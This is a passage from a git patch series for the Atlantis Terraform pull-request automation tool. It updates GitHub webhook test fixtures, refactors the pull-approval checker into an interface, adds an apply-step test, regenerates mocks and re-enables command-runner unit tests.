+1,15 @@ { "action": "closed", - "number": 1, + "number": 2, "pull_request": { - "url": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls/1", + "url": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls/2", "id": 193308707, "node_id": "MDExOlB1bGxSZXF1ZXN0MTkzMzA4NzA3", - "html_url": "https://github.com/runatlantis/atlantis-tests/pull/1", - "diff_url": "https://github.com/runatlantis/atlantis-tests/pull/1.diff", - "patch_url": "https://github.com/runatlantis/atlantis-tests/pull/1.patch", - "issue_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/1", - "number": 1, + "html_url": "https://github.com/runatlantis/atlantis-tests/pull/2", + "diff_url": "https://github.com/runatlantis/atlantis-tests/pull/2.diff", + "patch_url": "https://github.com/runatlantis/atlantis-tests/pull/2.patch", + "issue_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/2", + "number": 2, "state": "closed", "locked": false, "title": "Add new project layouts", @@ -53,10 +53,10 @@ ], "milestone": null, - "commits_url": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls/1/commits", - "review_comments_url": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls/1/comments", + "commits_url": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls/2/commits", + "review_comments_url": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls/2/comments", "review_comment_url": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls/comments{/number}", - "comments_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/1/comments", + "comments_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/2/comments", "statuses_url": "https://api.github.com/repos/runatlantis/atlantis-tests/statuses/5e2d140b2d74bf61675677f01dc947ae8512e18e", "head": { "label": "runatlantis:atlantisyaml", @@ -308,25 +308,25 @@ }, "_links": { "self": { - "href": 
"https://api.github.com/repos/runatlantis/atlantis-tests/pulls/1" + "href": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls/2" }, "html": { - "href": "https://github.com/runatlantis/atlantis-tests/pull/1" + "href": "https://github.com/runatlantis/atlantis-tests/pull/2" }, "issue": { - "href": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/1" + "href": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/2" }, "comments": { - "href": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/1/comments" + "href": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/2/comments" }, "review_comments": { - "href": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls/1/comments" + "href": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls/2/comments" }, "review_comment": { "href": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls/comments{/number}" }, "commits": { - "href": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls/1/commits" + "href": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls/2/commits" }, "statuses": { "href": "https://api.github.com/repos/runatlantis/atlantis-tests/statuses/5e2d140b2d74bf61675677f01dc947ae8512e18e" diff --git a/server/testfixtures/githubPullRequestOpenedEvent.json b/server/testfixtures/githubPullRequestOpenedEvent.json index 0b969438ec..03ee106b5e 100644 --- a/server/testfixtures/githubPullRequestOpenedEvent.json +++ b/server/testfixtures/githubPullRequestOpenedEvent.json @@ -12,7 +12,7 @@ "number": 2, "state": "open", "locked": false, - "title": "Noyaml", + "title": "branch", "user": { "login": "runatlantis", "id": 1034429, @@ -59,8 +59,8 @@ "comments_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/2/comments", "statuses_url": "https://api.github.com/repos/runatlantis/atlantis-tests/statuses/c31fd9ea6f557ad2ea659944c3844a059b83bc5d", "head": { - "label": "runatlantis:noyaml", - "ref": "noyaml", 
+ "label": "runatlantis:branch", + "ref": "branch", "sha": "c31fd9ea6f557ad2ea659944c3844a059b83bc5d", "user": { "login": "runatlantis", diff --git a/server/testfixtures/test-repos/tfvars-yaml/exp-output-apply-default.txt.act b/server/testfixtures/test-repos/tfvars-yaml/exp-output-apply-default.txt.act deleted file mode 100644 index aa4f734726..0000000000 --- a/server/testfixtures/test-repos/tfvars-yaml/exp-output-apply-default.txt.act +++ /dev/null @@ -1,7 +0,0 @@ -Ran Apply in dir: `.` workspace: `default` -**Apply Error** -``` -no plan found at path "." and workspace "default"–did you run plan? -``` - - diff --git a/server/testfixtures/test-repos/tfvars-yaml/exp-output-autoplan.txt.act b/server/testfixtures/test-repos/tfvars-yaml/exp-output-autoplan.txt.act deleted file mode 100644 index 0da9bc5a5e..0000000000 --- a/server/testfixtures/test-repos/tfvars-yaml/exp-output-autoplan.txt.act +++ /dev/null @@ -1,61 +0,0 @@ -Ran Plan for 2 projects: -1. workspace: `default` path: `.` -1. workspace: `default` path: `.` - -### 1. workspace: `default` path: `.` -**Plan Error** -``` -exit status 1: running "sh -c terraform init -no-color -backend-config=default.backend.tfvars" in "/var/folders/z1/4z__7jv12y7f9yz__nwy55z40000gp/T/201347935/repos/runatlantis/atlantis-tests/1/default": - -Initializing the backend... - -Successfully configured the backend "local"! Terraform will automatically -use this backend unless the backend configuration changes. - -Initializing provider plugins... -- Checking for available provider plugins on https://releases.hashicorp.com... - -Error installing provider "null": Get https://releases.hashicorp.com/terraform-provider-null/: net/http: TLS handshake timeout. - -Terraform analyses the configuration and state and automatically downloads -plugins for the providers used. However, when attempting to download this -plugin an unexpected error occured. - -This may be caused if for some reason Terraform is unable to reach the -plugin repository. 
The repository may be unreachable if access is blocked -by a firewall. - -If automatic installation is not possible or desirable in your environment, -you may alternatively manually install plugins by downloading a suitable -distribution package and placing the plugin's executable file in the -following directory: - terraform.d/plugins/darwin_amd64 - - -``` - ---- -### 2. workspace: `default` path: `.` -```diff -Refreshing Terraform state in-memory prior to plan... -The refreshed state will be used to calculate this plan, but will not be -persisted to local or remote state storage. - - ------------------------------------------------------------------------- - -An execution plan has been generated and is shown below. -Resource actions are indicated with the following symbols: - + create - -Terraform will perform the following actions: - -+ null_resource.simple - id: -Plan: 1 to add, 0 to change, 0 to destroy. - -``` - -* To **discard** this plan click [here](lock-url). ---- - From 124a016f089451023402c0be0a03e4ef8ee77da1 Mon Sep 17 00:00:00 2001 From: Luke Kysow Date: Thu, 21 Jun 2018 18:27:03 +0100 Subject: [PATCH 41/69] WIP --- server/events/project_command_runner.go | 2 +- .../events/runtime/apply_step_runner_test.go | 27 +++++++++++++++++++ .../events/runtime/pull_approved_checker.go | 13 ++------- server/events_controller_e2e_test.go | 6 ++--- server/server.go | 6 ++--- 5 files changed, 34 insertions(+), 20 deletions(-) diff --git a/server/events/project_command_runner.go b/server/events/project_command_runner.go index 0db221defe..45117c3a06 100644 --- a/server/events/project_command_runner.go +++ b/server/events/project_command_runner.go @@ -153,7 +153,7 @@ func (p *ProjectCommandRunner) Apply(ctx models.ProjectCommandContext) ProjectCo for _, req := range ctx.ProjectConfig.ApplyRequirements { switch req { case "approved": - approved, err := p.PullApprovedChecker.IsApproved(ctx.BaseRepo, ctx.Pull) + approved, err := 
p.PullApprovedChecker.PullIsApproved(ctx.BaseRepo, ctx.Pull) if err != nil { return ProjectCommandResult{Error: errors.Wrap(err, "checking if pull request was approved")} } diff --git a/server/events/runtime/apply_step_runner_test.go b/server/events/runtime/apply_step_runner_test.go index afc5c99e30..4ebdc39c05 100644 --- a/server/events/runtime/apply_step_runner_test.go +++ b/server/events/runtime/apply_step_runner_test.go @@ -65,6 +65,33 @@ func TestRun_Success(t *testing.T) { terraform.VerifyWasCalledOnce().RunCommandWithVersion(nil, tmpDir, []string{"apply", "-no-color", "extra", "args", "comment", "args", planPath}, nil, "workspace") } +func TestRun_AppliesCorrectProjectPlan(t *testing.T) { + // When running for a project, the planfile has a different name. + tmpDir, cleanup := TempDir(t) + defer cleanup() + planPath := filepath.Join(tmpDir, "projectname-default.tfplan") + err := ioutil.WriteFile(planPath, nil, 0644) + Ok(t, err) + + RegisterMockTestingT(t) + terraform := mocks.NewMockClient() + o := runtime.ApplyStepRunner{ + TerraformExecutor: terraform, + } + + When(terraform.RunCommandWithVersion(matchers.AnyPtrToLoggingSimpleLogger(), AnyString(), AnyStringSlice(), matchers2.AnyPtrToGoVersionVersion(), AnyString())). 
+ ThenReturn("output", nil) + output, err := o.Run(models.ProjectCommandContext{ + Workspace: "default", + RepoRelPath: ".", + ProjectName: "projectname", + CommentArgs: []string{"comment", "args"}, + }, []string{"extra", "args"}, tmpDir) + Ok(t, err) + Equals(t, "output", output) + terraform.VerifyWasCalledOnce().RunCommandWithVersion(nil, tmpDir, []string{"apply", "-no-color", "extra", "args", "comment", "args", planPath}, nil, "default") +} + func TestRun_UsesConfiguredTFVersion(t *testing.T) { tmpDir, cleanup := TempDir(t) defer cleanup() diff --git a/server/events/runtime/pull_approved_checker.go b/server/events/runtime/pull_approved_checker.go index 049f434969..86945fce33 100644 --- a/server/events/runtime/pull_approved_checker.go +++ b/server/events/runtime/pull_approved_checker.go @@ -2,17 +2,8 @@ package runtime import ( "github.com/runatlantis/atlantis/server/events/models" - "github.com/runatlantis/atlantis/server/events/vcs" ) -type PullApprovedChecker struct { - VCSClient vcs.ClientProxy -} - -func (a *PullApprovedChecker) IsApproved(baseRepo models.Repo, pull models.PullRequest) (bool, error) { - approved, err := a.VCSClient.PullIsApproved(baseRepo, pull) - if err != nil { - return false, err - } - return approved, nil +type PullApprovedChecker interface { + PullIsApproved(baseRepo models.Repo, pull models.PullRequest) (bool, error) } diff --git a/server/events_controller_e2e_test.go b/server/events_controller_e2e_test.go index 5abb66ad37..85870df845 100644 --- a/server/events_controller_e2e_test.go +++ b/server/events_controller_e2e_test.go @@ -252,10 +252,8 @@ func setupE2E(t *testing.T) (server.EventsController, *vcsmocks.MockClientProxy, ApplyStepRunner: runtime.ApplyStepRunner{ TerraformExecutor: terraformClient, }, - RunStepRunner: runtime.RunStepRunner{}, - PullApprovedChecker: runtime.PullApprovedChecker{ - VCSClient: e2eVCSClient, - }, + RunStepRunner: runtime.RunStepRunner{}, + PullApprovedChecker: e2eVCSClient, Workspace: atlantisWorkspace, 
Webhooks: &mockWebhookSender{}, AtlantisWorkspaceLocker: locker, diff --git a/server/server.go b/server/server.go index 1980ba2521..d02c1c9221 100644 --- a/server/server.go +++ b/server/server.go @@ -251,10 +251,8 @@ func NewServer(userConfig UserConfig, config Config) (*Server, error) { ApplyStepRunner: runtime.ApplyStepRunner{ TerraformExecutor: terraformClient, }, - RunStepRunner: runtime.RunStepRunner{}, - PullApprovedChecker: runtime.PullApprovedChecker{ - VCSClient: vcsClient, - }, + RunStepRunner: runtime.RunStepRunner{}, + PullApprovedChecker: vcsClient, Workspace: workspace, Webhooks: webhooksManager, AtlantisWorkspaceLocker: workspaceLocker, From 17a9c7f535d91dc49193ede612beaa2e8cf6a9f4 Mon Sep 17 00:00:00 2001 From: Luke Kysow Date: Thu, 21 Jun 2018 18:50:19 +0100 Subject: [PATCH 42/69] Regen mocks --- Makefile | 11 +- server/events/command_runner_test.go | 359 +++++++++--------- server/events/executor.go | 22 -- .../matchers/events_commandparseresult.go | 20 - ...nd.go => ptr_to_events_trylockresponse.go} | 10 +- .../mocks/mock_atlantis_workspace_locker.go | 51 +++ server/events/mocks/mock_executor.go | 76 ---- server/events/mocks/mock_project_lock.go | 98 +++++ server/events/vcs/mocks/mock_client.go | 20 +- server/logging/simple_logger.go | 2 + 10 files changed, 355 insertions(+), 314 deletions(-) delete mode 100644 server/events/executor.go delete mode 100644 server/events/mocks/matchers/events_commandparseresult.go rename server/events/mocks/matchers/{ptr_to_events_command.go => ptr_to_events_trylockresponse.go} (51%) delete mode 100644 server/events/mocks/mock_executor.go create mode 100644 server/events/mocks/mock_project_lock.go diff --git a/Makefile b/Makefile index 5f10ddf0eb..c2510ac725 100644 --- a/Makefile +++ b/Makefile @@ -28,11 +28,12 @@ build-service: ## Build the main Go service go-generate: ## Run go generate in all packages go generate $(PKG) -regen-mocks: ## Delete all mocks and then run go generate to regen them - find . 
-type f | grep mocks/mock | grep -v vendor | xargs rm - @# not using $(PKG) here because that it includes directories that have now - @# been deleted, causing go generate to fail. - go generate $$(go list ./... | grep -v e2e | grep -v vendor | grep -v static) +#regen-mocks: ## Delete all mocks and matchers and then run go generate to regen them. This doesn't work anymore. +#find . -type f | grep mocks/mock_ | grep -v vendor | xargs rm +#find . -type f | grep mocks/matchers | grep -v vendor | xargs rm +#@# not using $(PKG) here because that it includes directories that have now +#@# been deleted, causing go generate to fail. +#echo "this doesn't work anymore: go generate \$\$(go list ./... | grep -v e2e | grep -v vendor | grep -v static)" test: ## Run tests @go test -short $(PKG) diff --git a/server/events/command_runner_test.go b/server/events/command_runner_test.go index a0d636c9a8..456ce6d293 100644 --- a/server/events/command_runner_test.go +++ b/server/events/command_runner_test.go @@ -15,15 +15,22 @@ package events_test import ( "bytes" + "errors" "log" + "strings" "testing" + "github.com/google/go-github/github" . "github.com/petergtz/pegomock" "github.com/runatlantis/atlantis/server/events" "github.com/runatlantis/atlantis/server/events/mocks" + "github.com/runatlantis/atlantis/server/events/mocks/matchers" + "github.com/runatlantis/atlantis/server/events/models" + "github.com/runatlantis/atlantis/server/events/models/fixtures" + "github.com/runatlantis/atlantis/server/events/vcs" vcsmocks "github.com/runatlantis/atlantis/server/events/vcs/mocks" logmocks "github.com/runatlantis/atlantis/server/logging/mocks" - //. "github.com/runatlantis/atlantis/testing" + . 
"github.com/runatlantis/atlantis/testing" ) var projectCommandBuilder *mocks.MockProjectCommandBuilder @@ -62,178 +69,178 @@ func setup(t *testing.T) { } } -//func TestExecuteCommand_LogPanics(t *testing.T) { -// t.Log("if there is a panic it is commented back on the pull request") -// setup(t) -// ch.AllowForkPRs = true // Lets us get to the panic code. -// defer func() { ch.AllowForkPRs = false }() -// When(ghStatus.Update(fixtures.GithubRepo, fixtures.Pull, vcs.Pending, events.Plan)).ThenPanic("panic") -// ch.RunCommentCommand(fixtures.GithubRepo, &fixtures.GithubRepo, fixtures.User, 1, nil) -// _, _, comment := vcsClient.VerifyWasCalledOnce().CreateComment(matchers.AnyModelsRepo(), AnyInt(), AnyString()).GetCapturedArguments() -// Assert(t, strings.Contains(comment, "Error: goroutine panic"), "comment should be about a goroutine panic") -//} -// -//func TestExecuteCommand_NoGithubPullGetter(t *testing.T) { -// t.Log("if DefaultCommandRunner was constructed with a nil GithubPullGetter an error should be logged") -// setup(t) -// ch.GithubPullGetter = nil -// ch.RunCommentCommand(fixtures.GithubRepo, &fixtures.GithubRepo, fixtures.User, 1, nil) -// Equals(t, "[ERROR] runatlantis/atlantis#1: Atlantis not configured to support GitHub\n", logBytes.String()) -//} -// -//func TestExecuteCommand_NoGitlabMergeGetter(t *testing.T) { -// t.Log("if DefaultCommandRunner was constructed with a nil GitlabMergeRequestGetter an error should be logged") -// setup(t) -// ch.GitlabMergeRequestGetter = nil -// ch.RunCommentCommand(fixtures.GitlabRepo, &fixtures.GitlabRepo, fixtures.User, 1, nil) -// Equals(t, "[ERROR] runatlantis/atlantis#1: Atlantis not configured to support GitLab\n", logBytes.String()) -//} -// -//func TestExecuteCommand_GithubPullErr(t *testing.T) { -// t.Log("if getting the github pull request fails an error should be logged") -// setup(t) -// When(githubGetter.GetPullRequest(fixtures.GithubRepo, fixtures.Pull.Num)).ThenReturn(nil, errors.New("err")) -// 
ch.RunCommentCommand(fixtures.GithubRepo, &fixtures.GithubRepo, fixtures.User, fixtures.Pull.Num, nil) -// Equals(t, "[ERROR] runatlantis/atlantis#1: Making pull request API call to GitHub: err\n", logBytes.String()) -//} -// -//func TestExecuteCommand_GitlabMergeRequestErr(t *testing.T) { -// t.Log("if getting the gitlab merge request fails an error should be logged") -// setup(t) -// When(gitlabGetter.GetMergeRequest(fixtures.GithubRepo.FullName, fixtures.Pull.Num)).ThenReturn(nil, errors.New("err")) -// ch.RunCommentCommand(fixtures.GitlabRepo, &fixtures.GitlabRepo, fixtures.User, fixtures.Pull.Num, nil) -// Equals(t, "[ERROR] runatlantis/atlantis#1: Making merge request API call to GitLab: err\n", logBytes.String()) -//} -// -//func TestExecuteCommand_GithubPullParseErr(t *testing.T) { -// t.Log("if parsing the returned github pull request fails an error should be logged") -// setup(t) -// var pull github.PullRequest -// When(githubGetter.GetPullRequest(fixtures.GithubRepo, fixtures.Pull.Num)).ThenReturn(&pull, nil) -// When(eventParsing.ParseGithubPull(&pull)).ThenReturn(fixtures.Pull, fixtures.GithubRepo, errors.New("err")) -// -// ch.RunCommentCommand(fixtures.GithubRepo, &fixtures.GithubRepo, fixtures.User, fixtures.Pull.Num, nil) -// Equals(t, "[ERROR] runatlantis/atlantis#1: Extracting required fields from comment data: err\n", logBytes.String()) -//} -// -//func TestExecuteCommand_ForkPRDisabled(t *testing.T) { -// t.Log("if a command is run on a forked pull request and this is disabled atlantis should" + -// " comment saying that this is not allowed") -// setup(t) -// ch.AllowForkPRs = false // by default it's false so don't need to reset -// var pull github.PullRequest -// modelPull := models.PullRequest{State: models.Open} -// When(githubGetter.GetPullRequest(fixtures.GithubRepo, fixtures.Pull.Num)).ThenReturn(&pull, nil) -// -// headRepo := fixtures.GithubRepo -// headRepo.FullName = "forkrepo/atlantis" -// headRepo.Owner = "forkrepo" -// 
When(eventParsing.ParseGithubPull(&pull)).ThenReturn(modelPull, headRepo, nil) -// -// ch.RunCommentCommand(fixtures.GithubRepo, nil, fixtures.User, fixtures.Pull.Num, nil) -// vcsClient.VerifyWasCalledOnce().CreateComment(fixtures.GithubRepo, modelPull.Num, "Atlantis commands can't be run on fork pull requests. To enable, set --"+ch.AllowForkPRsFlag) -//} -// -//func TestExecuteCommand_ClosedPull(t *testing.T) { -// t.Log("if a command is run on a closed pull request atlantis should" + -// " comment saying that this is not allowed") -// setup(t) -// pull := &github.PullRequest{ -// State: github.String("closed"), -// } -// modelPull := models.PullRequest{State: models.Closed} -// When(githubGetter.GetPullRequest(fixtures.GithubRepo, fixtures.Pull.Num)).ThenReturn(pull, nil) -// When(eventParsing.ParseGithubPull(pull)).ThenReturn(modelPull, fixtures.GithubRepo, nil) -// -// ch.RunCommentCommand(fixtures.GithubRepo, &fixtures.GithubRepo, fixtures.User, fixtures.Pull.Num, nil) -// vcsClient.VerifyWasCalledOnce().CreateComment(fixtures.GithubRepo, modelPull.Num, "Atlantis commands can't be run on closed pull requests") -//} -// -//func TestExecuteCommand_WorkspaceLocked(t *testing.T) { -// t.Log("if the workspace is locked, should comment back on the pull") -// setup(t) -// pull := &github.PullRequest{ -// State: github.String("closed"), -// } -// cmd := events.CommentCommand{ -// Name: events.Plan, -// Workspace: "workspace", -// } -// -// When(githubGetter.GetPullRequest(fixtures.GithubRepo, fixtures.Pull.Num)).ThenReturn(pull, nil) -// When(eventParsing.ParseGithubPull(pull)).ThenReturn(fixtures.Pull, fixtures.GithubRepo, nil) -// When(workspaceLocker.TryLock(fixtures.GithubRepo.FullName, cmd.Workspace, fixtures.Pull.Num)).ThenReturn(false) -// ch.RunCommentCommand(fixtures.GithubRepo, &fixtures.GithubRepo, fixtures.User, fixtures.Pull.Num, &cmd) -// -// msg := "The workspace workspace is currently locked by another" + -// " command that is running for this pull 
request." + -// " Wait until the previous command is complete and try again." -// ghStatus.VerifyWasCalledOnce().Update(fixtures.GithubRepo, fixtures.Pull, vcs.Pending, cmd.CommandName()) -// _, _, result := ghStatus.VerifyWasCalledOnce().UpdateProjectResult(matchers.AnyPtrToEventsCommandContext(), matchers.AnyEventsCommandName(), matchers.AnyEventsCommandResult()).GetCapturedArguments() -// Equals(t, msg, result.Failure) -// vcsClient.VerifyWasCalledOnce().CreateComment(fixtures.GithubRepo, fixtures.Pull.Num, -// "**Plan Failed**: "+msg+"\n\n") -//} -// -//func TestExecuteCommand_FullRun(t *testing.T) { -// t.Log("when running a plan, apply should comment") -// pull := &github.PullRequest{ -// State: github.String("closed"), -// } -// cmdResult := events.CommandResult{} -// for _, c := range []events.CommandName{events.Plan, events.Apply} { -// setup(t) -// cmd := events.CommentCommand{ -// Name: c, -// Workspace: "workspace", -// } -// When(githubGetter.GetPullRequest(fixtures.GithubRepo, fixtures.Pull.Num)).ThenReturn(pull, nil) -// When(eventParsing.ParseGithubPull(pull)).ThenReturn(fixtures.Pull, fixtures.GithubRepo, nil) -// When(workspaceLocker.TryLock(fixtures.GithubRepo.FullName, cmd.Workspace, fixtures.Pull.Num)).ThenReturn(true) -// switch c { -// case events.Plan: -// When(projectCommandBuilder.PlanViaComment(matchers.AnyPtrToEventsCommandContext())).ThenReturn(cmdResult) -// case events.Apply: -// When(projectCommandBuilder.ApplyViaComment(matchers.AnyPtrToEventsCommandContext())).ThenReturn(cmdResult) -// } -// -// ch.RunCommentCommand(fixtures.GithubRepo, fixtures.GithubRepo, fixtures.User, fixtures.Pull.Num, &cmd) -// -// ghStatus.VerifyWasCalledOnce().Update(fixtures.GithubRepo, fixtures.Pull, vcs.Pending, &cmd) -// _, response := ghStatus.VerifyWasCalledOnce().UpdateProjectResult(matchers.AnyPtrToEventsCommandContext(), matchers.AnyEventsCommandResult()).GetCapturedArguments() -// Equals(t, cmdResult, response) -// 
vcsClient.VerifyWasCalledOnce().CreateComment(matchers.AnyModelsRepo(), AnyInt(), AnyString()) -// workspaceLocker.VerifyWasCalledOnce().Unlock(fixtures.GithubRepo.FullName, cmd.Workspace, fixtures.Pull.Num) -// } -//} -// -//func TestExecuteCommand_ForkPREnabled(t *testing.T) { -// t.Log("when running a plan on a fork PR, it should succeed") -// setup(t) -// -// // Enable forked PRs. -// ch.AllowForkPRs = true -// defer func() { ch.AllowForkPRs = false }() // Reset after test. -// -// var pull github.PullRequest -// cmdResponse := events.CommandResult{} -// cmd := events.CommentCommand{ -// Name: events.Plan, -// Workspace: "workspace", -// } -// When(githubGetter.GetPullRequest(fixtures.GithubRepo, fixtures.Pull.Num)).ThenReturn(&pull, nil) -// headRepo := fixtures.GithubRepo -// headRepo.FullName = "forkrepo/atlantis" -// headRepo.Owner = "forkrepo" -// When(eventParsing.ParseGithubPull(&pull)).ThenReturn(fixtures.Pull, headRepo, nil) -// When(workspaceLocker.TryLock(fixtures.GithubRepo.FullName, cmd.Workspace, fixtures.Pull.Num)).ThenReturn(true) -// When(projectCommandBuilder.PlanViaComment(matchers.AnyPtrToEventsCommandContext())).ThenReturn(cmdResponse) -// -// ch.RunCommentCommand(fixtures.GithubRepo, models.Repo{} /* this isn't used */, fixtures.User, fixtures.Pull.Num, &cmd) -// -// ghStatus.VerifyWasCalledOnce().Update(fixtures.GithubRepo, fixtures.Pull, vcs.Pending, &cmd) -// _, response := ghStatus.VerifyWasCalledOnce().UpdateProjectResult(matchers.AnyPtrToEventsCommandContext(), matchers.AnyEventsCommandResult()).GetCapturedArguments() -// Equals(t, cmdResponse, response) -// vcsClient.VerifyWasCalledOnce().CreateComment(matchers.AnyModelsRepo(), AnyInt(), AnyString()) -// workspaceLocker.VerifyWasCalledOnce().Unlock(fixtures.GithubRepo.FullName, cmd.Workspace, fixtures.Pull.Num) -//} +func TestExecuteCommand_LogPanics(t *testing.T) { + t.Log("if there is a panic it is commented back on the pull request") + setup(t) + ch.AllowForkPRs = true // Lets us 
get to the panic code. + defer func() { ch.AllowForkPRs = false }() + When(ghStatus.Update(fixtures.GithubRepo, fixtures.Pull, vcs.Pending, events.Plan)).ThenPanic("panic") + ch.RunCommentCommand(fixtures.GithubRepo, &fixtures.GithubRepo, fixtures.User, 1, nil) + _, _, comment := vcsClient.VerifyWasCalledOnce().CreateComment(matchers.AnyModelsRepo(), AnyInt(), AnyString()).GetCapturedArguments() + Assert(t, strings.Contains(comment, "Error: goroutine panic"), "comment should be about a goroutine panic") +} + +func TestExecuteCommand_NoGithubPullGetter(t *testing.T) { + t.Log("if DefaultCommandRunner was constructed with a nil GithubPullGetter an error should be logged") + setup(t) + ch.GithubPullGetter = nil + ch.RunCommentCommand(fixtures.GithubRepo, &fixtures.GithubRepo, fixtures.User, 1, nil) + Equals(t, "[ERROR] runatlantis/atlantis#1: Atlantis not configured to support GitHub\n", logBytes.String()) +} + +func TestExecuteCommand_NoGitlabMergeGetter(t *testing.T) { + t.Log("if DefaultCommandRunner was constructed with a nil GitlabMergeRequestGetter an error should be logged") + setup(t) + ch.GitlabMergeRequestGetter = nil + ch.RunCommentCommand(fixtures.GitlabRepo, &fixtures.GitlabRepo, fixtures.User, 1, nil) + Equals(t, "[ERROR] runatlantis/atlantis#1: Atlantis not configured to support GitLab\n", logBytes.String()) +} + +func TestExecuteCommand_GithubPullErr(t *testing.T) { + t.Log("if getting the github pull request fails an error should be logged") + setup(t) + When(githubGetter.GetPullRequest(fixtures.GithubRepo, fixtures.Pull.Num)).ThenReturn(nil, errors.New("err")) + ch.RunCommentCommand(fixtures.GithubRepo, &fixtures.GithubRepo, fixtures.User, fixtures.Pull.Num, nil) + Equals(t, "[ERROR] runatlantis/atlantis#1: Making pull request API call to GitHub: err\n", logBytes.String()) +} + +func TestExecuteCommand_GitlabMergeRequestErr(t *testing.T) { + t.Log("if getting the gitlab merge request fails an error should be logged") + setup(t) + 
When(gitlabGetter.GetMergeRequest(fixtures.GithubRepo.FullName, fixtures.Pull.Num)).ThenReturn(nil, errors.New("err")) + ch.RunCommentCommand(fixtures.GitlabRepo, &fixtures.GitlabRepo, fixtures.User, fixtures.Pull.Num, nil) + Equals(t, "[ERROR] runatlantis/atlantis#1: Making merge request API call to GitLab: err\n", logBytes.String()) +} + +func TestExecuteCommand_GithubPullParseErr(t *testing.T) { + t.Log("if parsing the returned github pull request fails an error should be logged") + setup(t) + var pull github.PullRequest + When(githubGetter.GetPullRequest(fixtures.GithubRepo, fixtures.Pull.Num)).ThenReturn(&pull, nil) + When(eventParsing.ParseGithubPull(&pull)).ThenReturn(fixtures.Pull, fixtures.GithubRepo, errors.New("err")) + + ch.RunCommentCommand(fixtures.GithubRepo, &fixtures.GithubRepo, fixtures.User, fixtures.Pull.Num, nil) + Equals(t, "[ERROR] runatlantis/atlantis#1: Extracting required fields from comment data: err\n", logBytes.String()) +} + +func TestExecuteCommand_ForkPRDisabled(t *testing.T) { + t.Log("if a command is run on a forked pull request and this is disabled atlantis should" + + " comment saying that this is not allowed") + setup(t) + ch.AllowForkPRs = false // by default it's false so don't need to reset + var pull github.PullRequest + modelPull := models.PullRequest{State: models.Open} + When(githubGetter.GetPullRequest(fixtures.GithubRepo, fixtures.Pull.Num)).ThenReturn(&pull, nil) + + headRepo := fixtures.GithubRepo + headRepo.FullName = "forkrepo/atlantis" + headRepo.Owner = "forkrepo" + When(eventParsing.ParseGithubPull(&pull)).ThenReturn(modelPull, headRepo, nil) + + ch.RunCommentCommand(fixtures.GithubRepo, nil, fixtures.User, fixtures.Pull.Num, nil) + vcsClient.VerifyWasCalledOnce().CreateComment(fixtures.GithubRepo, modelPull.Num, "Atlantis commands can't be run on fork pull requests. 
To enable, set --"+ch.AllowForkPRsFlag) +} + +func TestExecuteCommand_ClosedPull(t *testing.T) { + t.Log("if a command is run on a closed pull request atlantis should" + + " comment saying that this is not allowed") + setup(t) + pull := &github.PullRequest{ + State: github.String("closed"), + } + modelPull := models.PullRequest{State: models.Closed} + When(githubGetter.GetPullRequest(fixtures.GithubRepo, fixtures.Pull.Num)).ThenReturn(pull, nil) + When(eventParsing.ParseGithubPull(pull)).ThenReturn(modelPull, fixtures.GithubRepo, nil) + + ch.RunCommentCommand(fixtures.GithubRepo, &fixtures.GithubRepo, fixtures.User, fixtures.Pull.Num, nil) + vcsClient.VerifyWasCalledOnce().CreateComment(fixtures.GithubRepo, modelPull.Num, "Atlantis commands can't be run on closed pull requests") +} + +func TestExecuteCommand_WorkspaceLocked(t *testing.T) { + t.Log("if the workspace is locked, should comment back on the pull") + setup(t) + pull := &github.PullRequest{ + State: github.String("closed"), + } + cmd := events.CommentCommand{ + Name: events.Plan, + Workspace: "workspace", + } + + When(githubGetter.GetPullRequest(fixtures.GithubRepo, fixtures.Pull.Num)).ThenReturn(pull, nil) + When(eventParsing.ParseGithubPull(pull)).ThenReturn(fixtures.Pull, fixtures.GithubRepo, nil) + When(workspaceLocker.TryLock(fixtures.GithubRepo.FullName, cmd.Workspace, fixtures.Pull.Num)).ThenReturn(false) + ch.RunCommentCommand(fixtures.GithubRepo, &fixtures.GithubRepo, fixtures.User, fixtures.Pull.Num, &cmd) + + msg := "The workspace workspace is currently locked by another" + + " command that is running for this pull request." + + " Wait until the previous command is complete and try again." 
+ ghStatus.VerifyWasCalledOnce().Update(fixtures.GithubRepo, fixtures.Pull, vcs.Pending, cmd.CommandName()) + _, _, result := ghStatus.VerifyWasCalledOnce().UpdateProjectResult(matchers.AnyPtrToEventsCommandContext(), matchers.AnyEventsCommandName(), matchers.AnyEventsCommandResult()).GetCapturedArguments() + Equals(t, msg, result.Failure) + vcsClient.VerifyWasCalledOnce().CreateComment(fixtures.GithubRepo, fixtures.Pull.Num, + "**Plan Failed**: "+msg+"\n\n") +} + +func TestExecuteCommand_FullRun(t *testing.T) { + t.Log("when running a plan, apply should comment") + pull := &github.PullRequest{ + State: github.String("closed"), + } + cmdResult := events.CommandResult{} + for _, c := range []events.CommandName{events.Plan, events.Apply} { + setup(t) + cmd := events.CommentCommand{ + Name: c, + Workspace: "workspace", + } + When(githubGetter.GetPullRequest(fixtures.GithubRepo, fixtures.Pull.Num)).ThenReturn(pull, nil) + When(eventParsing.ParseGithubPull(pull)).ThenReturn(fixtures.Pull, fixtures.GithubRepo, nil) + When(workspaceLocker.TryLock(fixtures.GithubRepo.FullName, cmd.Workspace, fixtures.Pull.Num)).ThenReturn(true) + switch c { + case events.Plan: + When(projectCommandBuilder.PlanViaComment(matchers.AnyPtrToEventsCommandContext())).ThenReturn(cmdResult) + case events.Apply: + 